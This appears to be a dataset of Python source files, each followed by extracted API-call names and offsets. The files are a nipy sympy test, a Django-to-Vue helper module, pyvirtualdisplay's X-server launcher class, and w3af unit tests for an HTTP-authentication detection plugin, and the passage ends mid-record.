def test_2d():
B1, B2 = [gen_BrownianMotion() for _ in range(2)]
B1s = formula.aliased_function("B1", B1)
B2s = formula.aliased_function("B2", B2)
t = sympy.DeferredVector('t')
s = sympy.DeferredVector('s')
e = B1s(s)+B2s(t)
n={}; aliased._add_aliases_to_namespace(n, e)
ee = sympy.lambdify((s,t), e, (n, 'numpy'))
np.testing.assert_almost_equal(ee(B1.x, B2.x), B1.y + B2.y)
| [
"numpy.random.standard_normal",
"numpy.sqrt",
"numpy.arange",
"nipy.modalities.fmri.aliased._add_aliases_to_namespace",
"sympy.lambdify",
"numpy.exp",
"nipy.modalities.fmri.formula.aliased_function",
"numpy.cumsum",
"sympy.DeferredVector"
] | [((411, 432), 'numpy.arange', 'np.arange', (['(0)', '(5)', '(0.01)'], {}), '(0, 5, 0.01)\n', (420, 432), True, 'import numpy as np\n'), ((439, 472), 'numpy.random.standard_normal', 'np.random.standard_normal', (['(500,)'], {}), '((500,))\n', (464, 472), True, 'import numpy as np\n'), ((633, 665), 'nipy.modalities.fmri.formula.aliased_function', 'formula.aliased_function', (['"""B"""', 'B'], {}), "('B', B)\n", (657, 665), False, 'from nipy.modalities.fmri import formula, aliased\n'), ((674, 699), 'sympy.DeferredVector', 'sympy.DeferredVector', (['"""t"""'], {}), "('t')\n", (694, 699), False, 'import sympy\n'), ((711, 751), 'nipy.modalities.fmri.aliased._add_aliases_to_namespace', 'aliased._add_aliases_to_namespace', (['n', 'Bs'], {}), '(n, Bs)\n', (744, 751), False, 'from nipy.modalities.fmri import formula, aliased\n'), ((796, 833), 'sympy.lambdify', 'sympy.lambdify', (['t', 'expr', "(n, 'numpy')"], {}), "(t, expr, (n, 'numpy'))\n", (810, 833), False, 'import sympy\n'), ((977, 1011), 'nipy.modalities.fmri.formula.aliased_function', 'formula.aliased_function', (['"""B1"""', 'B1'], {}), "('B1', B1)\n", (1001, 1011), False, 'from nipy.modalities.fmri import formula, aliased\n'), ((1022, 1056), 'nipy.modalities.fmri.formula.aliased_function', 'formula.aliased_function', (['"""B2"""', 'B2'], {}), "('B2', B2)\n", (1046, 1056), False, 'from nipy.modalities.fmri import formula, aliased\n'), ((1066, 1091), 'sympy.DeferredVector', 'sympy.DeferredVector', (['"""t"""'], {}), "('t')\n", (1086, 1091), False, 'import sympy\n'), ((1100, 1125), 'sympy.DeferredVector', 'sympy.DeferredVector', (['"""s"""'], {}), "('s')\n", (1120, 1125), False, 'import sympy\n'), ((1159, 1198), 'nipy.modalities.fmri.aliased._add_aliases_to_namespace', 'aliased._add_aliases_to_namespace', (['n', 'e'], {}), '(n, e)\n', (1192, 1198), False, 'from nipy.modalities.fmri import formula, aliased\n'), ((1209, 1248), 'sympy.lambdify', 'sympy.lambdify', (['(s, t)', 'e', "(n, 'numpy')"], {}), "((s, t), e, (n, 'numpy'))\n", (1223, 1248), False, 'import sympy\n'), ((481, 493), 'numpy.cumsum', 'np.cumsum', (['y'], {}), '(y)\n', (490, 493), True, 'import numpy as np\n'), ((494, 507), 'numpy.sqrt', 'np.sqrt', (['(0.01)'], {}), '(0.01)\n', (501, 507), True, 'import numpy as np\n'), ((881, 892), 'numpy.exp', 'np.exp', (['B.y'], {}), '(B.y)\n', (887, 892), True, 'import numpy as np\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import sys
import jsbeautifier
from bs4 import BeautifulSoup
from django.apps import apps
from django.conf import settings
from django.template.loader import render_to_string
from editorconfig import PathError
def flatten(lst: []) -> []:
if not isinstance(lst, (list, tuple)):
return [lst]
if not lst:
return lst
return flatten(lst[0]) + flatten(lst[1:])
def convert_to_pascalcase(string: str) -> str:
return "".join(
[word.capitalize() for word in re.findall(r"[a-zA-Z0-9]+", string)])
def convert_to_camelcase(string: str) -> str:
string = convert_to_pascalcase(string)
return string[0].lower() + string[1:]
def convert_to_kebab_case(string: str) -> str:
return re.sub('(?!^)([A-Z])', r'-\1', string).lower()
def replace(match: str) -> str:
return ':' + match.groups()[-1]
def render_to_js_string(template: str, context: {}):
output = render_to_string(template, context)
options = jsbeautifier.default_options()
opts_file = getattr(settings, 'EDITOR_CONFIG', '.editorconfig')
options.brace_style = 'collapse,preserve-inline'
try:
jsbeautifier.set_file_editorconfig_opts(opts_file, options)
except PathError:
log("No editor config found at: {opts_file}")
log("Using defaults.")
return jsbeautifier.beautify(output, opts=options)
def render_to_html_string(template, context):
# todo find a nicer library to pretty print
if True:
output = render_to_string(template, context)
return output.replace('</label>', '</label>\n')
output = render_to_string(template, context)
soup = BeautifulSoup(output, 'html.parser')
return soup.prettify(None, None)
def as_vue(self):
for name, field in self.fields.items():
template: str = field.widget.template_name
field.widget.template_name = template.replace('django/forms', 'djue')
return self._html_output(
normal_row='<div%(html_class_attr)s> %(field)s%('
'help_text)s</div>',
error_row='%s',
row_ender='</div>',
help_text_html=' <span class="helptext">%s</span>',
errors_on_separate_row=True)
def get_app_name(obj):
try:
return apps.get_containing_app_config(obj.__module__).name
except AttributeError:
log("Object is not part of an app. About to do stupid shit")
return obj.__module__.split('.')[0]
def convert_file_to_component_name(path):
file_name = path.split(os.path.sep)[-1]
return convert_to_pascalcase(file_name.split('.')[0].capitalize())
def log(msg):
sys.stdout.write(msg)
sys.stdout.write('\n')
def get_output_path():
root = getattr(settings, 'DJUE_OUTPUT_DIR', os.getcwd())
path = os.path.join(root, 'src')
os.makedirs(path, exist_ok=True)
return path
| [
"os.makedirs",
"jsbeautifier.set_file_editorconfig_opts",
"jsbeautifier.default_options",
"os.path.join",
"os.getcwd",
"bs4.BeautifulSoup",
"django.apps.apps.get_containing_app_config",
"re.sub",
"re.findall",
"jsbeautifier.beautify",
"django.template.loader.render_to_string",
"sys.stdout.writ... | [((979, 1014), 'django.template.loader.render_to_string', 'render_to_string', (['template', 'context'], {}), '(template, context)\n', (995, 1014), False, 'from django.template.loader import render_to_string\n'), ((1029, 1059), 'jsbeautifier.default_options', 'jsbeautifier.default_options', ([], {}), '()\n', (1057, 1059), False, 'import jsbeautifier\n'), ((1378, 1421), 'jsbeautifier.beautify', 'jsbeautifier.beautify', (['output'], {'opts': 'options'}), '(output, opts=options)\n', (1399, 1421), False, 'import jsbeautifier\n'), ((1654, 1689), 'django.template.loader.render_to_string', 'render_to_string', (['template', 'context'], {}), '(template, context)\n', (1670, 1689), False, 'from django.template.loader import render_to_string\n'), ((1701, 1737), 'bs4.BeautifulSoup', 'BeautifulSoup', (['output', '"""html.parser"""'], {}), "(output, 'html.parser')\n", (1714, 1737), False, 'from bs4 import BeautifulSoup\n'), ((2667, 2688), 'sys.stdout.write', 'sys.stdout.write', (['msg'], {}), '(msg)\n', (2683, 2688), False, 'import sys\n'), ((2693, 2715), 'sys.stdout.write', 'sys.stdout.write', (['"""\n"""'], {}), "('\\n')\n", (2709, 2715), False, 'import sys\n'), ((2813, 2838), 'os.path.join', 'os.path.join', (['root', '"""src"""'], {}), "(root, 'src')\n", (2825, 2838), False, 'import os\n'), ((2843, 2875), 'os.makedirs', 'os.makedirs', (['path'], {'exist_ok': '(True)'}), '(path, exist_ok=True)\n', (2854, 2875), False, 'import os\n'), ((1199, 1258), 'jsbeautifier.set_file_editorconfig_opts', 'jsbeautifier.set_file_editorconfig_opts', (['opts_file', 'options'], {}), '(opts_file, options)\n', (1238, 1258), False, 'import jsbeautifier\n'), ((1548, 1583), 'django.template.loader.render_to_string', 'render_to_string', (['template', 'context'], {}), '(template, context)\n', (1564, 1583), False, 'from django.template.loader import render_to_string\n'), ((2789, 2800), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2798, 2800), False, 'import os\n'), ((794, 832), 're.sub', 're.sub', (['"""(?!^)([A-Z])"""', '"""-\\\\1"""', 'string'], {}), "('(?!^)([A-Z])', '-\\\\1', string)\n", (800, 832), False, 'import re\n'), ((2296, 2342), 'django.apps.apps.get_containing_app_config', 'apps.get_containing_app_config', (['obj.__module__'], {}), '(obj.__module__)\n', (2326, 2342), False, 'from django.apps import apps\n'), ((562, 596), 're.findall', 're.findall', (['"""[a-zA-Z0-9]+"""', 'string'], {}), "('[a-zA-Z0-9]+', string)\n", (572, 596), False, 'import re\n')] |
import fnmatch
import logging
import os
import select
import signal
import subprocess
import tempfile
import time
from threading import Lock
from easyprocess import EasyProcess, EasyProcessError
from pyvirtualdisplay import xauth
from pyvirtualdisplay.util import get_helptext, py2
# try:
# import fcntl
# except ImportError:
# fcntl = None
_mutex = Lock()
log = logging.getLogger(__name__)
_MIN_DISPLAY_NR = 1000
_USED_DISPLAY_NR_LIST = []
_X_START_TIMEOUT = 10
_X_START_TIME_STEP = 0.1
_X_START_WAIT = 0.1
class XStartTimeoutError(Exception):
pass
class XStartError(Exception):
pass
def _lock_files():
tmpdir = "/tmp"
try:
ls = os.listdir(tmpdir)
except FileNotFoundError:
log.warning("missing /tmp")
return []
pattern = ".X*-lock"
names = fnmatch.filter(ls, pattern)
ls = [os.path.join(tmpdir, child) for child in names]
ls = [p for p in ls if os.path.isfile(p)]
return ls
def _search_for_display(randomizer=None):
# search for free display
ls = list(map(lambda x: int(x.split("X")[1].split("-")[0]), _lock_files()))
if len(ls):
display = max(_MIN_DISPLAY_NR, max(ls) + 3)
else:
display = _MIN_DISPLAY_NR
if randomizer:
display = randomizer.generate()
return display
class AbstractDisplay(object):
"""
Common parent for X servers (Xvfb,Xephyr,Xvnc)
"""
def __init__(self, program, use_xauth, randomizer, retries, extra_args):
self._extra_args = extra_args
self._retries = retries
self._program = program
self._randomizer = randomizer
self.stdout = None
self.stderr = None
self.old_display_var = None
self._subproc = None
self.display = None
self.is_started = False
helptext = get_helptext(program)
self._has_displayfd = "-displayfd" in helptext
if not self._has_displayfd:
log.debug("-displayfd flag is missing.")
# if check_startup and not has_displayfd:
# check_startup = False
# log.warning(
# program
# + " -displayfd flag is not supported, 'check_startup' parameter has been disabled"
# )
self._check_flags(helptext)
if use_xauth and not xauth.is_installed():
raise xauth.NotFoundError()
self._use_xauth = use_xauth
self._old_xauth = None
self._xauth_filename = None
# self.check_startup = check_startup
# if check_startup and not fcntl:
# self.check_startup = False
# log.warning(
# "fcntl module can't be imported, 'check_startup' parameter has been disabled"
# )
# log.warning("fnctl module does not exist on Windows")
# if self.check_startup:
# rp, wp = os.pipe()
# fcntl.fcntl(rp, fcntl.F_SETFD, fcntl.FD_CLOEXEC)
# # TODO: to properly allow to inherit fds to subprocess on
# # python 3.2+ the easyprocess needs small fix..
# fcntl.fcntl(wp, fcntl.F_SETFD, 0)
# self.check_startup_fd = wp
# self._check_startup_fd = rp
# self.proc = EasyProcess(self._cmd())
def _check_flags(self, helptext):
pass
def _cmd(self):
raise NotImplementedError()
def _redirect_display(self, on):
"""
on:
* True -> set $DISPLAY to virtual screen
* False -> set $DISPLAY to original screen
:param on: bool
"""
d = self.new_display_var if on else self.old_display_var
if d is None:
log.debug("unset $DISPLAY")
try:
del os.environ["DISPLAY"]
except KeyError:
log.warning("$DISPLAY was already unset.")
else:
log.debug("$DISPLAY=%s", d)
os.environ["DISPLAY"] = d
def start(self):
"""
start display
:rtype: self
"""
if self.is_started:
raise XStartError(self, "Display was started twice.")
self.is_started = True
if self._has_displayfd:
self._start1()
else:
i = 0
while True:
try:
self._start1()
break
except XStartError:
log.warning("start failed %s", i + 1)
time.sleep(0.05)
i += 1
if i >= self._retries:
raise XStartError(
"No success after %s retries. Last stderr: %s"
% (self._retries, self.stderr)
)
finally:
self._redirect_display(False)
self._redirect_display(True)
def _start1(self):
if self._has_displayfd:
# stdout doesn't work on osx -> create own pipe
rfd, self._pipe_wfd = os.pipe()
else:
with _mutex:
self.display = _search_for_display(randomizer=self._randomizer)
while self.display in _USED_DISPLAY_NR_LIST:
self.display += 1
self.new_display_var = ":%s" % int(self.display)
_USED_DISPLAY_NR_LIST.append(self.display)
self._command = self._cmd() + self._extra_args
log.debug("command: %s", self._command)
self._stdout_file = tempfile.TemporaryFile(prefix="stdout_")
self._stderr_file = tempfile.TemporaryFile(prefix="stderr_")
if py2() or not self._has_displayfd:
self._subproc = subprocess.Popen(
self._command,
stdout=self._stdout_file,
stderr=self._stderr_file,
shell=False,
)
else:
if self._has_displayfd:
self._subproc = subprocess.Popen(
self._command,
pass_fds=[self._pipe_wfd],
stdout=self._stdout_file,
stderr=self._stderr_file,
shell=False,
)
if self._has_displayfd:
# rfd = self.subproc.stdout.fileno()
self.display = int(self._wait_for_pipe_text(rfd))
os.close(rfd)
os.close(self._pipe_wfd)
self.new_display_var = ":%s" % int(self.display)
if self._use_xauth:
self._setup_xauth()
# https://github.com/ponty/PyVirtualDisplay/issues/2
# https://github.com/ponty/PyVirtualDisplay/issues/14
self.old_display_var = os.environ.get("DISPLAY", None)
# wait until X server is active
start_time = time.time()
# if self.check_startup:
# rp = self._check_startup_fd
# display_check = None
# rlist, wlist, xlist = select.select((rp,), (), (), _X_START_TIMEOUT)
# if rlist:
# display_check = os.read(rp, 10).rstrip()
# else:
# msg = "No display number returned by X server"
# raise XStartTimeoutError(msg)
# dnbs = str(self.display)
# if bytes != str:
# dnbs = bytes(dnbs, "ascii")
# if display_check != dnbs:
# msg = 'Display number "%s" not returned by X server' + str(
# display_check
# )
# raise XStartTimeoutError(msg % self.display)
if not self._has_displayfd:
self._redirect_display(True) # for xdpyinfo
d = self.new_display_var
ok = False
time.sleep(0.05) # give time for early exit
while True:
if not self.is_alive():
break
try:
xdpyinfo = EasyProcess(["xdpyinfo"])
xdpyinfo.enable_stdout_log = False
xdpyinfo.enable_stderr_log = False
exit_code = xdpyinfo.call().return_code
except EasyProcessError:
log.warning(
"xdpyinfo was not found, X start can not be checked! Please install xdpyinfo!"
)
time.sleep(_X_START_WAIT) # old method
ok = True
break
if exit_code != 0:
pass
else:
log.info('Successfully started X with display "%s".', d)
ok = True
break
if time.time() - start_time >= _X_START_TIMEOUT:
break
time.sleep(_X_START_TIME_STEP)
if not self.is_alive():
log.warning("process exited early. stderr:%s", self.stderr)
msg = "Failed to start process: %s"
raise XStartError(msg % self)
if not ok:
msg = 'Failed to start X on display "%s" (xdpyinfo check failed, stderr:[%s]).'
raise XStartTimeoutError(msg % (d, xdpyinfo.stderr))
return self
def _wait_for_pipe_text(self, rfd):
s = ""
start_time = time.time()
while True:
(rfd_changed_ls, _, _) = select.select([rfd], [], [], 0.1)
if not self.is_alive():
raise XStartError(
"%s program closed. command: %s stderr: %s"
% (self._program, self._command, self.stderr)
)
if rfd in rfd_changed_ls:
c = os.read(rfd, 1)
if c == b"\n":
break
s += c.decode("ascii")
if time.time() - start_time >= _X_START_TIMEOUT:
raise XStartTimeoutError(
"No reply from program %s. command:%s"
% (self._program, self._command,)
)
return s
def stop(self):
"""
stop display
:rtype: self
"""
if not self.is_started:
raise XStartError("stop() is called before start().")
self._redirect_display(False)
if self.is_alive():
try:
try:
self._subproc.terminate()
except AttributeError:
os.kill(self._subproc.pid, signal.SIGKILL)
except OSError as oserror:
log.debug("exception in terminate:%s", oserror)
self._subproc.wait()
self._read_stdout_stderr()
if self._use_xauth:
self._clear_xauth()
return self
def _read_stdout_stderr(self):
if self.stdout is None:
self._stdout_file.seek(0)
self._stderr_file.seek(0)
self.stdout = self._stdout_file.read()
self.stderr = self._stderr_file.read()
self._stdout_file.close()
self._stderr_file.close()
log.debug("stdout=%s", self.stdout)
log.debug("stderr=%s", self.stderr)
def _setup_xauth(self):
"""
Set up the Xauthority file and the XAUTHORITY environment variable.
"""
handle, filename = tempfile.mkstemp(
prefix="PyVirtualDisplay.", suffix=".Xauthority"
)
self._xauth_filename = filename
os.close(handle)
# Save old environment
self._old_xauth = {}
self._old_xauth["AUTHFILE"] = os.getenv("AUTHFILE")
self._old_xauth["XAUTHORITY"] = os.getenv("XAUTHORITY")
os.environ["AUTHFILE"] = os.environ["XAUTHORITY"] = filename
cookie = xauth.generate_mcookie()
xauth.call("add", self.new_display_var, ".", cookie)
def _clear_xauth(self):
"""
Clear the Xauthority file and restore the environment variables.
"""
os.remove(self._xauth_filename)
for varname in ["AUTHFILE", "XAUTHORITY"]:
if self._old_xauth[varname] is None:
del os.environ[varname]
else:
os.environ[varname] = self._old_xauth[varname]
self._old_xauth = None
def __enter__(self):
"""used by the :keyword:`with` statement"""
self.start()
return self
def __exit__(self, *exc_info):
"""used by the :keyword:`with` statement"""
self.stop()
def is_alive(self):
return self.return_code is None
@property
def return_code(self):
rc = self._subproc.poll()
if rc is not None:
# proc exited
self._read_stdout_stderr()
return rc
@property
def pid(self):
"""
PID (:attr:`subprocess.Popen.pid`)
:rtype: int
"""
if self._subproc:
return self._subproc.pid
| [
"logging.getLogger",
"time.sleep",
"pyvirtualdisplay.xauth.call",
"os.read",
"pyvirtualdisplay.util.py2",
"os.remove",
"os.kill",
"os.listdir",
"pyvirtualdisplay.xauth.generate_mcookie",
"threading.Lock",
"subprocess.Popen",
"select.select",
"os.close",
"os.path.isfile",
"time.time",
"... | [((363, 369), 'threading.Lock', 'Lock', ([], {}), '()\n', (367, 369), False, 'from threading import Lock\n'), ((377, 404), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (394, 404), False, 'import logging\n'), ((816, 843), 'fnmatch.filter', 'fnmatch.filter', (['ls', 'pattern'], {}), '(ls, pattern)\n', (830, 843), False, 'import fnmatch\n'), ((676, 694), 'os.listdir', 'os.listdir', (['tmpdir'], {}), '(tmpdir)\n', (686, 694), False, 'import os\n'), ((854, 881), 'os.path.join', 'os.path.join', (['tmpdir', 'child'], {}), '(tmpdir, child)\n', (866, 881), False, 'import os\n'), ((1825, 1846), 'pyvirtualdisplay.util.get_helptext', 'get_helptext', (['program'], {}), '(program)\n', (1837, 1846), False, 'from pyvirtualdisplay.util import get_helptext, py2\n'), ((5496, 5536), 'tempfile.TemporaryFile', 'tempfile.TemporaryFile', ([], {'prefix': '"""stdout_"""'}), "(prefix='stdout_')\n", (5518, 5536), False, 'import tempfile\n'), ((5565, 5605), 'tempfile.TemporaryFile', 'tempfile.TemporaryFile', ([], {'prefix': '"""stderr_"""'}), "(prefix='stderr_')\n", (5587, 5605), False, 'import tempfile\n'), ((6660, 6691), 'os.environ.get', 'os.environ.get', (['"""DISPLAY"""', 'None'], {}), "('DISPLAY', None)\n", (6674, 6691), False, 'import os\n'), ((6754, 6765), 'time.time', 'time.time', ([], {}), '()\n', (6763, 6765), False, 'import time\n'), ((9244, 9255), 'time.time', 'time.time', ([], {}), '()\n', (9253, 9255), False, 'import time\n'), ((11259, 11325), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'prefix': '"""PyVirtualDisplay."""', 'suffix': '""".Xauthority"""'}), "(prefix='PyVirtualDisplay.', suffix='.Xauthority')\n", (11275, 11325), False, 'import tempfile\n'), ((11396, 11412), 'os.close', 'os.close', (['handle'], {}), '(handle)\n', (11404, 11412), False, 'import os\n'), ((11511, 11532), 'os.getenv', 'os.getenv', (['"""AUTHFILE"""'], {}), "('AUTHFILE')\n", (11520, 11532), False, 'import os\n'), ((11573, 11596), 'os.getenv', 'os.getenv', (['"""XAUTHORITY"""'], {}), "('XAUTHORITY')\n", (11582, 11596), False, 'import os\n'), ((11684, 11708), 'pyvirtualdisplay.xauth.generate_mcookie', 'xauth.generate_mcookie', ([], {}), '()\n', (11706, 11708), False, 'from pyvirtualdisplay import xauth\n'), ((11717, 11769), 'pyvirtualdisplay.xauth.call', 'xauth.call', (['"""add"""', 'self.new_display_var', '"""."""', 'cookie'], {}), "('add', self.new_display_var, '.', cookie)\n", (11727, 11769), False, 'from pyvirtualdisplay import xauth\n'), ((11904, 11935), 'os.remove', 'os.remove', (['self._xauth_filename'], {}), '(self._xauth_filename)\n', (11913, 11935), False, 'import os\n'), ((929, 946), 'os.path.isfile', 'os.path.isfile', (['p'], {}), '(p)\n', (943, 946), False, 'import os\n'), ((2353, 2374), 'pyvirtualdisplay.xauth.NotFoundError', 'xauth.NotFoundError', ([], {}), '()\n', (2372, 2374), False, 'from pyvirtualdisplay import xauth\n'), ((5010, 5019), 'os.pipe', 'os.pipe', ([], {}), '()\n', (5017, 5019), False, 'import os\n'), ((5618, 5623), 'pyvirtualdisplay.util.py2', 'py2', ([], {}), '()\n', (5621, 5623), False, 'from pyvirtualdisplay.util import get_helptext, py2\n'), ((5680, 5781), 'subprocess.Popen', 'subprocess.Popen', (['self._command'], {'stdout': 'self._stdout_file', 'stderr': 'self._stderr_file', 'shell': '(False)'}), '(self._command, stdout=self._stdout_file, stderr=self.\n _stderr_file, shell=False)\n', (5696, 5781), False, 'import subprocess\n'), ((6336, 6349), 'os.close', 'os.close', (['rfd'], {}), '(rfd)\n', (6344, 6349), False, 'import os\n'), ((6362, 6386), 'os.close', 'os.close', (['self._pipe_wfd'], {}), '(self._pipe_wfd)\n', (6370, 6386), False, 'import os\n'), ((7694, 7710), 'time.sleep', 'time.sleep', (['(0.05)'], {}), '(0.05)\n', (7704, 7710), False, 'import time\n'), ((9313, 9346), 'select.select', 'select.select', (['[rfd]', '[]', '[]', '(0.1)'], {}), '([rfd], [], [], 0.1)\n', (9326, 9346), False, 'import select\n'), ((2313, 2333), 'pyvirtualdisplay.xauth.is_installed', 'xauth.is_installed', ([], {}), '()\n', (2331, 2333), False, 'from pyvirtualdisplay import xauth\n'), ((5938, 6066), 'subprocess.Popen', 'subprocess.Popen', (['self._command'], {'pass_fds': '[self._pipe_wfd]', 'stdout': 'self._stdout_file', 'stderr': 'self._stderr_file', 'shell': '(False)'}), '(self._command, pass_fds=[self._pipe_wfd], stdout=self.\n _stdout_file, stderr=self._stderr_file, shell=False)\n', (5954, 6066), False, 'import subprocess\n'), ((8717, 8747), 'time.sleep', 'time.sleep', (['_X_START_TIME_STEP'], {}), '(_X_START_TIME_STEP)\n', (8727, 8747), False, 'import time\n'), ((9624, 9639), 'os.read', 'os.read', (['rfd', '(1)'], {}), '(rfd, 1)\n', (9631, 9639), False, 'import os\n'), ((7882, 7907), 'easyprocess.EasyProcess', 'EasyProcess', (["['xdpyinfo']"], {}), "(['xdpyinfo'])\n", (7893, 7907), False, 'from easyprocess import EasyProcess, EasyProcessError\n'), ((9751, 9762), 'time.time', 'time.time', ([], {}), '()\n', (9760, 9762), False, 'import time\n'), ((4458, 4474), 'time.sleep', 'time.sleep', (['(0.05)'], {}), '(0.05)\n', (4468, 4474), False, 'import time\n'), ((8297, 8322), 'time.sleep', 'time.sleep', (['_X_START_WAIT'], {}), '(_X_START_WAIT)\n', (8307, 8322), False, 'import time\n'), ((8629, 8640), 'time.time', 'time.time', ([], {}), '()\n', (8638, 8640), False, 'import time\n'), ((10384, 10426), 'os.kill', 'os.kill', (['self._subproc.pid', 'signal.SIGKILL'], {}), '(self._subproc.pid, signal.SIGKILL)\n', (10391, 10426), False, 'import os\n')] |
"""
test_http_auth_detect.py
Copyright 2012 <NAME>
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import unittest
import w3af.core.data.kb.knowledge_base as kb
from w3af.core.data.url.HTTPResponse import HTTPResponse
from w3af.core.data.request.fuzzable_request import FuzzableRequest
from w3af.core.data.parsers.doc.url import URL
from w3af.core.data.dc.headers import Headers
from w3af.plugins.grep.http_auth_detect import http_auth_detect
class test_http_auth_detect(unittest.TestCase):
def setUp(self):
self.url = URL('http://www.w3af.com/')
self.headers = Headers({'content-type': 'text/html'}.items())
self.request = FuzzableRequest(self.url, method='GET')
self.plugin = http_auth_detect()
kb.kb.cleanup()
def tearDown(self):
self.plugin.end()
def test_http_auth_detect_negative(self):
response = HTTPResponse(200, '', self.headers, self.url, self.url, _id=1)
self.plugin.grep(self.request, response)
self.assertEqual(len(kb.kb.get('http_auth_detect', 'auth')), 0)
self.assertEqual(len(kb.kb.get('http_auth_detect', 'userPassUri')), 0)
def test_http_auth_detect_negative_long(self):
body = 'ABC ' * 10000
response = HTTPResponse(200, body, self.headers, self.url, self.url, _id=1)
self.plugin.grep(self.request, response)
self.assertEqual(len(kb.kb.get('http_auth_detect', 'auth')), 0)
self.assertEqual(len(kb.kb.get('http_auth_detect', 'userPassUri')), 0)
def test_http_auth_detect_uri(self):
body = 'ABC ' * 100
body += '<a href="http://abc:def@www.w3af.com/foo.bar">test</a>'
body += '</br> ' * 50
response = HTTPResponse(200, body, self.headers, self.url, self.url, _id=1)
self.plugin.grep(self.request, response)
self.assertEqual(len(kb.kb.get('http_auth_detect', 'auth')), 0)
self.assertEqual(len(kb.kb.get('http_auth_detect', 'userPassUri')), 1)
def test_http_auth_detect_non_rfc(self):
body = ''
response = HTTPResponse(401, body, self.headers, self.url, self.url, _id=1)
self.plugin.grep(self.request, response)
self.assertEqual(
len(kb.kb.get('http_auth_detect', 'non_rfc_auth')), 1)
self.assertEqual(len(kb.kb.get('http_auth_detect', 'userPassUri')), 0)
def test_http_auth_detect_simple(self):
body = ''
hdrs = {'content-type': 'text/html', 'www-authenticate': 'realm-w3af'}
hdrs = Headers(hdrs.items())
response = HTTPResponse(401, body, hdrs, self.url, self.url, _id=1)
self.plugin.grep(self.request, response)
self.assertEqual(len(kb.kb.get('http_auth_detect', 'auth')), 1)
self.assertEqual(len(kb.kb.get('http_auth_detect', 'userPassUri')), 0)
| [
"w3af.core.data.kb.knowledge_base.kb.cleanup",
"w3af.core.data.kb.knowledge_base.kb.get",
"w3af.core.data.url.HTTPResponse.HTTPResponse",
"w3af.core.data.parsers.doc.url.URL",
"w3af.core.data.request.fuzzable_request.FuzzableRequest",
"w3af.plugins.grep.http_auth_detect.http_auth_detect"
] | [((1147, 1174), 'w3af.core.data.parsers.doc.url.URL', 'URL', (['"""http://www.w3af.com/"""'], {}), "('http://www.w3af.com/')\n", (1150, 1174), False, 'from w3af.core.data.parsers.doc.url import URL\n'), ((1268, 1307), 'w3af.core.data.request.fuzzable_request.FuzzableRequest', 'FuzzableRequest', (['self.url'], {'method': '"""GET"""'}), "(self.url, method='GET')\n", (1283, 1307), False, 'from w3af.core.data.request.fuzzable_request import FuzzableRequest\n'), ((1330, 1348), 'w3af.plugins.grep.http_auth_detect.http_auth_detect', 'http_auth_detect', ([], {}), '()\n', (1346, 1348), False, 'from w3af.plugins.grep.http_auth_detect import http_auth_detect\n'), ((1357, 1372), 'w3af.core.data.kb.knowledge_base.kb.cleanup', 'kb.kb.cleanup', ([], {}), '()\n', (1370, 1372), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((1490, 1552), 'w3af.core.data.url.HTTPResponse.HTTPResponse', 'HTTPResponse', (['(200)', '""""""', 'self.headers', 'self.url', 'self.url'], {'_id': '(1)'}), "(200, '', self.headers, self.url, self.url, _id=1)\n", (1502, 1552), False, 'from w3af.core.data.url.HTTPResponse import HTTPResponse\n'), ((1854, 1918), 'w3af.core.data.url.HTTPResponse.HTTPResponse', 'HTTPResponse', (['(200)', 'body', 'self.headers', 'self.url', 'self.url'], {'_id': '(1)'}), '(200, body, self.headers, self.url, self.url, _id=1)\n', (1866, 1918), False, 'from w3af.core.data.url.HTTPResponse import HTTPResponse\n'), ((2311, 2375), 'w3af.core.data.url.HTTPResponse.HTTPResponse', 'HTTPResponse', (['(200)', 'body', 'self.headers', 'self.url', 'self.url'], {'_id': '(1)'}), '(200, body, self.headers, self.url, self.url, _id=1)\n', (2323, 2375), False, 'from w3af.core.data.url.HTTPResponse import HTTPResponse\n'), ((2659, 2723), 'w3af.core.data.url.HTTPResponse.HTTPResponse', 'HTTPResponse', (['(401)', 'body', 'self.headers', 'self.url', 'self.url'], {'_id': '(1)'}), '(401, body, self.headers, self.url, self.url, _id=1)\n', (2671, 2723), False, 'from w3af.core.data.url.HTTPResponse import HTTPResponse\n'), ((3143, 3199), 'w3af.core.data.url.HTTPResponse.HTTPResponse', 'HTTPResponse', (['(401)', 'body', 'hdrs', 'self.url', 'self.url'], {'_id': '(1)'}), '(401, body, hdrs, self.url, self.url, _id=1)\n', (3155, 3199), False, 'from w3af.core.data.url.HTTPResponse import HTTPResponse\n'), ((1631, 1668), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""auth"""'], {}), "('http_auth_detect', 'auth')\n", (1640, 1668), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((1703, 1747), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""userPassUri"""'], {}), "('http_auth_detect', 'userPassUri')\n", (1712, 1747), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((1997, 2034), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""auth"""'], {}), "('http_auth_detect', 'auth')\n", (2006, 2034), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((2069, 2113), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""userPassUri"""'], {}), "('http_auth_detect', 'userPassUri')\n", (2078, 2113), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((2454, 2491), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""auth"""'], {}), "('http_auth_detect', 'auth')\n", (2463, 2491), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((2526, 2570), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', 